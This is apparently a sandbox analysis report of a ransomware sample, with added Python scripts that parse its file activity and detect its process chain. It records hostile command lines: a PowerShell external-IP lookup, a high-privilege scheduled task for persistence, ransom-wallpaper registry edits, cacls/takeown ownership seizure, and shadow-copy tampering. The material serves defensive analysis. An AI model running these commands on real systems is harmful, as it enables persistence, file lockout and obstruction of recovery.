  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec64.exe
  C:\Program Files\Java\jre7\lib\zi\America\Regina
  C:\Program Files\Java\jre7\lib\zi\Etc\GMT-4
  C:\Program Files\Mozilla Firefox\install.log
  C:\Program Files\Java\jre7\lib\security\US_export_policy.jar
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Abidjan
  C:\Program Files\Java\jdk1.7.0_80\lib\jawt.lib
  C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs
  C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png
  C:\Program Files\Java\jre7\lib\zi\Asia\Oral
  C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\EmptyDatabase.zip
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-favorites.jar
  C:\Program Files\Java\jre7\lib\management\management.properties
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-7
  C:\Program Files\Java\jre7\lib\zi\Europe\Prague
  C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\id.pak
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Halifax
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port-au-Prince
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\booklist.gif
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-uisupport.xml
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_ja.jar
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_zh_CN.jar
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Magadan
  C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar
  C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer.bat
  C:\Program Files\Java\jre7\bin\ssvagent.exe
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host.xml
  C:\Program Files\Java\jre7\lib\zi\America\Monterrey
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-lib-uihandler.xml
  C:\Program Files\Mozilla Firefox\firefox.exe.sig
  C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm.xml
  C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_200_percent.pak
  C:\Program Files\Java\jdk1.7.0_80\db\bin\startNetworkServer.bat
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CET
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Luxembourg
  C:\Program Files\Java\jre7\lib\zi\SystemV\YST9
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Petersburg
  C:\Program Files\Microsoft Games\Chess\it-IT\Chess.exe.mui
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_ja_4.4.0.v20140623020002.jar
  C:\Program Files\Microsoft Games\Purble Place\desktop.ini
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-print.jar
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Enderbury
  C:\Program Files\Java\jdk1.7.0_80\db\bin\ij.bat
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-5
  C:\Program Files\Java\jre7\lib\zi\Asia\Urumqi
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240389.profile.gz
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_zh_4.4.0.v20140623020002.jar
  C:\Program Files\Microsoft Games\Multiplayer\Backgammon\de-DE\bckgRes.dll.mui
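The file-activity lists on this page (and in other reports from the same sandbox) run their records together with no delimiter, and the paths contain spaces, so splitting on whitespace does not recover them. The parser below is an added example, not the sandbox's own code: it recovers (action, path, process) records by requiring the process token to be followed by the next action keyword or the end of the dump, then aggregates them the way a responder scoping an incident would, listing the directories that received the ransom note and the extensions of files opened for modification. The six sample records are copied from the lists above; the action keywords and the note file name are taken from this page.

```python
"""Parser for the flattened file-activity records in this report.  Added
example, not the sandbox's code.  A record is "<action> <path> <process>";
the path may contain spaces, so a record only ends at a *.exe token that is
followed by the next action keyword or by the end of the dump."""
import re
from collections import Counter
from pathlib import PureWindowsPath

ACTIONS = ("File opened for modification", "File created", "File opened (read-only)")
_ACT = "|".join(re.escape(a) for a in ACTIONS)
# Lazy path, then a process token, then a lookahead for the next action keyword
# or the end of the dump (the page ends its lists with a stray " -").
RECORD = re.compile(
    r"(" + _ACT + r")\s+(.+?)\s+(\S+\.exe)(?=\s+(?:" + _ACT + r")|\s*-?\s*$)",
    re.S,
)
NOTE_NAME = "#KOK8_README#.rtf"  # ransom-note file name seen in this report

# Sample dump: six records copied from this report, run together as the page
# presents them.
SAMPLE_PROC = "941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"
SAMPLE = " ".join([
    r"File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\orbd.exe " + SAMPLE_PROC,
    r"File created C:\Program Files\Microsoft Games\FreeCell\fr-FR\#KOK8_README#.rtf " + SAMPLE_PROC,
    r"File created C:\Program Files (x86)\Adobe\Reader 9.0\#KOK8_README#.rtf " + SAMPLE_PROC,
    r"File opened for modification C:\Program Files\Mozilla Firefox\install.log " + SAMPLE_PROC,
    r"File opened for modification C:\Program Files\Java\jre7\lib\security\US_export_policy.jar " + SAMPLE_PROC,
    r"File opened (read-only) \??\V: " + SAMPLE_PROC,
]) + " -"


def parse(dump):
    """Return a list of (action, path, process) tuples from a flattened dump."""
    return [(m.group(1), m.group(2), m.group(3)) for m in RECORD.finditer(dump)]


def summarize(records):
    """Counts per action, directories that received the ransom note, and the
    extension histogram of files opened for modification."""
    by_action = Counter(action for action, _, _ in records)
    note_dirs = sorted(
        str(PureWindowsPath(path).parent)
        for action, path, _ in records
        if action == "File created" and PureWindowsPath(path).name == NOTE_NAME
    )
    modified_ext = Counter(
        PureWindowsPath(path).suffix.lower() or "<none>"
        for action, path, _ in records
        if action == "File opened for modification"
    )
    return {"by_action": by_action, "note_dirs": note_dirs, "modified_ext": modified_ext}


if __name__ == "__main__":
    for key, value in summarize(parse(SAMPLE)).items():
        print(key, value)
```

Paste a whole list into `parse()` and the `note_dirs` result is the set of directories the sample reached; the `<none>` bucket in `modified_ext` is where the extensionless zoneinfo files end up, which is the quickest way to notice that a sample is not extension-gated.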
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution. Here the task DSHCA runs C:\Users\Admin\AppData\Roaming\jBIuzzaK.bat every 5 minutes with /RL HIGHEST and is started immediately with schtasks /Run /I (see the process tree); both schtasks calls are launched from wscript.exe running jGLSZ8VD.vbs rather than by the sample directly, so a parent-process rule that only looks at the sample's own children misses them.
pid Process: 5580 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery. The vssadmin.exe command line is not captured in this excerpt; the VSS service (vssvc.exe, PID 3216) enabling SeBackupPrivilege and SeRestorePrivilege in the privilege list below is consistent with it servicing that request.
pid Process: 5756 vssadmin.exe
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process: 2640 powershell.exe; 4084 D22bUU4y64.exe (6 records)
Suspicious behavior: LoadsDriver 1 IoCs
pid Process: 4084 D22bUU4y64.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process
SeDebugPrivilege: 2640 powershell.exe
SeDebugPrivilege, SeLoadDriverPrivilege: 4084 D22bUU4y64.exe
SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege: 3216 vssvc.exe
SeTakeOwnershipPrivilege: takeown.exe, PIDs 3016, 5624, 3852, 5688, 5764, 4772, 4468, 2240, 3980, 1564, 5312, 5464, 2456, 2400, 5676, 3612, 3316, 4104 (18 records)
SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35: 3792 WMIC.exe (the full set enabled twice, 40 records)
The three privileges reported only by LUID (33, 34, 35) are SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege and SeCreateSymbolicLinkPrivilege. WMIC enables every privilege in its token when it starts, so its 40 records are its normal behaviour and carry no signal on their own; the entries that matter here are SeLoadDriverPrivilege on D22bUU4y64.exe, which is what the LoadsDriver behaviour above needs, and SeTakeOwnershipPrivilege on the 18 takeown.exe instances spawned by the file-unlock wrapper in the process tree.
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target
Every parent/child pair below is recorded four times (64 records for 16 distinct pairs), and every pair is a parent writing into a child it has just created, so this signature documents the process tree rather than injection into an unrelated process.
PID 2868 (941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe) wrote to memory of 2936 (target 29), 2732 (31), 796 (33), 1960 (36), 1724 (37), 1568 (44)
PID 796 (cmd.exe) wrote to memory of 2640 (35)
PID 1960 (cmd.exe) wrote to memory of 1576 (40), 1492 (42), 1816 (43)
PID 1724 (cmd.exe) wrote to memory of 828 (41)
PID 1568 (cmd.exe) wrote to memory of 2776 (46), 2628 (47), 3912 (48)
PID 3912 (cmd.exe) wrote to memory of 3936 (50)
PID 3936 (D22bUU4y.exe) wrote to memory of 4084 (51)
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
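The signatures above describe individual behaviours; what makes this run recognisable is how they sit in the process tree that follows (the sample spawns cmd.exe wrappers, and the file-unlock step is a cmd.exe subtree of cacls, takeown and a renamed tool). The script below is an added example, not the sandbox's or the sample's code: it re-states the command-line-visible behaviours from this report as heuristics over Sysmon event 1 / Security 4688 style (pid, ppid, image, command line) records, and evaluates the unlock chain on whole cmd.exe subtrees so that it does not depend on the random names yc1StfN0.bat or D22bUU4y.exe. The sample records are constructed from the process tree on this page (PIDs and command lines are the report's; the parent PID 1000 of the top-level process is an assumption, and the 1960 cmd.exe line is cut to its first reg add), and the external-IP host list contains only the host seen here.

```python
"""Chain-aware triage of process-creation records for the behaviours in this
report.  Added example, not the sandbox's code or the sample's."""
import re
from collections import defaultdict

T = r"C:\Users\Admin\AppData\Local\Temp\FoxRansomware"
S = "941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"
A = r"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"

# (pid, ppid, image, command line), constructed from this report's process tree.
# PID 1000 as the parent of the sample is an assumption.
EVENTS = [
    (2868, 1000, S, '"' + T + '\\' + S + '"'),
    (796, 2868, "cmd.exe", '"C:\\Windows\\system32\\cmd.exe" /C powershell "$webClient = New-Object -TypeName '
     "System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')\">\"" + T + '\\2AtfLWqd.txt"'),
    (2640, 796, "powershell.exe", 'powershell "$webClient = New-Object -TypeName System.Net.WebClient; '
     "$webClient.DownloadString('http://myexternalip.com/raw')\""),
    (1960, 2868, "cmd.exe", '"C:\\Windows\\system32\\cmd.exe" /C reg add "HKCU\\Control Panel\\Desktop" /v Wallpaper '
     '/t REG_SZ /d "C:\\Users\\Admin\\AppData\\Roaming\\Mf8QLzo3.bmp" /f'),
    (1576, 1960, "reg.exe", 'reg add "HKCU\\Control Panel\\Desktop" /v Wallpaper /t REG_SZ '
     '/d "C:\\Users\\Admin\\AppData\\Roaming\\Mf8QLzo3.bmp" /f'),
    (1724, 2868, "cmd.exe", '"C:\\Windows\\system32\\cmd.exe" /C wscript //B //Nologo "C:\\Users\\Admin\\AppData\\Roaming\\jGLSZ8VD.vbs"'),
    (828, 1724, "wscript.exe", 'wscript //B //Nologo "C:\\Users\\Admin\\AppData\\Roaming\\jGLSZ8VD.vbs"'),
    (752, 828, "cmd.exe", '"C:\\Windows\\System32\\cmd.exe" /C schtasks /Create /tn DSHCA '
     '/tr "C:\\Users\\Admin\\AppData\\Roaming\\jBIuzzaK.bat" /sc minute /mo 5 /RL HIGHEST /F'),
    (5580, 752, "schtasks.exe", 'schtasks /Create /tn DSHCA /tr "C:\\Users\\Admin\\AppData\\Roaming\\jBIuzzaK.bat" '
     '/sc minute /mo 5 /RL HIGHEST /F'),
    (1568, 2868, "cmd.exe", 'cmd /c ""' + T + '\\yc1StfN0.bat" "' + A + '""'),
    (2776, 1568, "cacls.exe", 'cacls "' + A + '" /E /G Admin:F /C'),
    (2628, 1568, "takeown.exe", 'takeown /F "' + A + '"'),
    (3912, 1568, "cmd.exe", 'C:\\Windows\\system32\\cmd.exe /c D22bUU4y.exe -accepteula "SignHere.pdf" -nobanner'),
    (3936, 3912, "D22bUU4y.exe", 'D22bUU4y.exe -accepteula "SignHere.pdf" -nobanner'),
    (4084, 3936, "D22bUU4y64.exe", 'D22bUU4y.exe -accepteula "SignHere.pdf" -nobanner'),
]

LOOKUP_HOSTS = ("myexternalip.com",)  # host seen in this report; extend for your estate
SCRIPT_EXT = r"\.(?:bat|cmd|vbs|js|ps1)\b"


def _children(events):
    kids = defaultdict(list)
    for ev in events:
        kids[ev[1]].append(ev)
    return kids


def _descendants(pid, kids):
    out, stack = [], list(kids.get(pid, []))
    while stack:
        ev = stack.pop()
        out.append(ev)
        stack.extend(kids.get(ev[0], []))
    return out


def ancestry(pid, events):
    """Image names from the root of the tree down to pid, for triage output."""
    by_pid = {ev[0]: ev for ev in events}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid][2])
        pid = by_pid[pid][1]
    return chain[::-1]


def triage(events):
    """Return [(rule, pid)] for every record matching one of the heuristics."""
    kids = _children(events)
    findings = []
    for pid, _ppid, image, cmd in events:
        img, low = image.lower(), cmd.lower()
        # External-IP lookup from PowerShell (network signature above).
        if img == "powershell.exe" and "downloadstring" in low and any(h in low for h in LOOKUP_HOSTS):
            findings.append(("external_ip_lookup", pid))
        # Wallpaper replaced through reg.exe (ransom-note display).
        if img == "reg.exe" and "control panel\\desktop" in low and re.search(r"/v\s+wallpaper\b", low):
            findings.append(("wallpaper_set_via_reg", pid))
        # Scheduled task running a script out of AppData with highest privileges.
        if (img == "schtasks.exe" and "/create" in low and "/rl highest" in low
                and re.search(r'/tr\s+"?[^"]*\\appdata\\[^"]*' + SCRIPT_EXT, low)):
            findings.append(("scheduled_task_appdata_highest", pid))
        # File-unlock chain: one cmd.exe subtree containing cacls (grant :F),
        # takeown /F and a tool run with Sysinternals-style -accepteula/-nobanner.
        if img == "cmd.exe":
            sub = _descendants(pid, kids)
            cacls = any(e[2].lower() == "cacls.exe" and re.search(r"/g\s+\S+:f\b", e[3].lower()) for e in sub)
            takeown = any(e[2].lower() == "takeown.exe" and "/f" in e[3].lower() for e in sub)
            tool = any("-accepteula" in e[3].lower() and "-nobanner" in e[3].lower() for e in sub)
            if cacls and takeown and tool:
                findings.append(("acl_takeown_unlock_chain", pid))
    return findings


if __name__ == "__main__":
    for rule, pid in triage(EVENTS):
        print(rule, pid, " > ".join(ancestry(pid, EVENTS)))
```

The unlock rule fires once per wrapper invocation on the cmd.exe that ran the batch file (PID 1568 here), not on the inner cmd.exe that only launched the tool, so the alert count equals the number of files the sample tried to unlock; `ancestry()` gives the path back to the sample for each hit.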
Processes

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe  (PID 2868)
  "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"
  - Matrix Ransomware
  - Loads dropped DLL
  - Drops desktop.ini file(s)
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\cmd.exe  (PID 2936)
    "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWiBQzcf.exe"

  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWiBQzcf.exe  (PID 2732)
    "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWiBQzcf.exe" -n
    - Executes dropped EXE

  C:\Windows\SysWOW64\cmd.exe  (PID 796)
    "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\2AtfLWqd.txt"
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 2640)
      powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\cmd.exe  (PID 1960)
    "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Mf8QLzo3.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\reg.exe  (PID 1576)
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Mf8QLzo3.bmp" /f
      - Sets desktop wallpaper using registry

    C:\Windows\SysWOW64\reg.exe  (PID 1492)
      reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f

    C:\Windows\SysWOW64\reg.exe  (PID 1816)
      reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
      - Matrix Ransomware

  C:\Windows\SysWOW64\cmd.exe  (PID 1724)
    "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\jGLSZ8VD.vbs"
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\wscript.exe  (PID 828)
      wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\jGLSZ8VD.vbs"

      C:\Windows\SysWOW64\cmd.exe  (PID 752)
        "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\jBIuzzaK.bat" /sc minute /mo 5 /RL HIGHEST /F

        C:\Windows\SysWOW64\schtasks.exe  (PID 5580)
          schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\jBIuzzaK.bat" /sc minute /mo 5 /RL HIGHEST /F
          - Creates scheduled task(s)

      C:\Windows\SysWOW64\cmd.exe  (PID 3164)
        "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA

        C:\Windows\SysWOW64\schtasks.exe  (PID 4708)
          schtasks /Run /I /tn DSHCA
The remaining second-level entries are repeated runs of the dropped wrapper yc1StfN0.bat, one per target file, all with the same shape: cacls grants Admin full control of the file, takeown takes ownership of it, and the dropped D22bUU4y.exe is run against the file with -accepteula and -nobanner, which are the command-line conventions of Sysinternals Handle. On this x64 host the 32-bit D22bUU4y.exe extracts D22bUU4y64.exe into %TEMP% and runs it, and that copy loads a driver (the LoadsDriver and SeLoadDriverPrivilege entries above belong to it). Later runs add a second call, D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner, which has the form of Handle's close-handle syntax (-c <handle> -y -p <process>), although the literal tokens Run and extract are not a handle value and a PID. The sample therefore does not carry its own code for defeating open-file locks; it relies on built-in ACL tools plus a dropped utility, so a detection should key on the cacls/takeown/-accepteula chain under one cmd.exe rather than on the random file names.

  C:\Windows\SysWOW64\cmd.exe  (PID 1568)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\cacls.exe  (PID 2776)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C

    C:\Windows\SysWOW64\takeown.exe  (PID 2628)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"

    C:\Windows\SysWOW64\cmd.exe  (PID 3912)
      C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "SignHere.pdf" -nobanner
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory

      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe  (PID 3936)
        D22bUU4y.exe -accepteula "SignHere.pdf" -nobanner
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory

        C:\Users\Admin\AppData\Local\Temp\D22bUU4y64.exe  (PID 4084)
          D22bUU4y.exe -accepteula "SignHere.pdf" -nobanner
          - Drops file in Drivers directory
          - Sets service image path in registry
          - Executes dropped EXE
          - Enumerates connected drives
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious behavior: LoadsDriver
          - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe  (PID 2708)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
    - Loads dropped DLL

    C:\Windows\SysWOW64\cacls.exe  (PID 4424)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C

    C:\Windows\SysWOW64\takeown.exe  (PID 3688)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"

    C:\Windows\SysWOW64\cmd.exe  (PID 4236)
      C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "StandardBusiness.pdf" -nobanner
      - Loads dropped DLL

      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe  (PID 2132)
        D22bUU4y.exe -accepteula "StandardBusiness.pdf" -nobanner
        - Executes dropped EXE

    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe  (PID 4404)
      D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE
  C:\Windows\SysWOW64\cmd.exe  (PID 5736)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""
    - Loads dropped DLL

    C:\Windows\SysWOW64\cacls.exe  (PID 1068)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C

    C:\Windows\SysWOW64\takeown.exe  (PID 2364)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
      - Modifies file permissions

    C:\Windows\SysWOW64\cmd.exe  (PID 1936)
      C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ENUtxt.pdf" -nobanner
      - Loads dropped DLL

      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe  (PID 3032)
        D22bUU4y.exe -accepteula "ENUtxt.pdf" -nobanner
        - Executes dropped EXE

    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe  (PID 5136)
      D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE
  C:\Windows\SysWOW64\cmd.exe  (PID 5172)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""
    - Loads dropped DLL

    C:\Windows\SysWOW64\cacls.exe  (PID 5200)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C

    C:\Windows\SysWOW64\takeown.exe  (PID 5220)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"

    C:\Windows\SysWOW64\cmd.exe  (PID 936)
      C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
      - Loads dropped DLL

      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe  (PID 2168)
        D22bUU4y.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
        - Executes dropped EXE

    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe  (PID 3672)
      D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE
  C:\Windows\SysWOW64\cmd.exe  (PID 556)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""
    - Loads dropped DLL

    C:\Windows\SysWOW64\cacls.exe  (PID 5292)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C

    C:\Windows\SysWOW64\takeown.exe  (PID 5312)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"

    C:\Windows\SysWOW64\cmd.exe  (PID 5340)
      C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "Dynamic.pdf" -nobanner
      - Loads dropped DLL

      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe  (PID 5348)
        D22bUU4y.exe -accepteula "Dynamic.pdf" -nobanner
        - Executes dropped EXE

    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe  (PID 5384)
      D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE
  C:\Windows\SysWOW64\cmd.exe  (PID 4312)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
    - Loads dropped DLL

    C:\Windows\SysWOW64\cacls.exe  (PID 5484)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C

    C:\Windows\SysWOW64\takeown.exe  (PID 5480)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
      - Modifies file permissions

    C:\Windows\SysWOW64\cmd.exe  (PID 5448)
      C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "DefaultID.pdf" -nobanner
      - Loads dropped DLL

      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe  (PID 5492)
        D22bUU4y.exe -accepteula "DefaultID.pdf" -nobanner
        - Executes dropped EXE

    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe  (PID 5512)
      D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE
  C:\Windows\SysWOW64\cmd.exe  (PID 5544)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""
    - Loads dropped DLL

    C:\Windows\SysWOW64\cacls.exe  (PID 2456)
      cacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C

    C:\Windows\SysWOW64\takeown.exe  (PID 1068)
      takeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"
      - Modifies file permissions

    C:\Windows\SysWOW64\cmd.exe  (PID 2364)
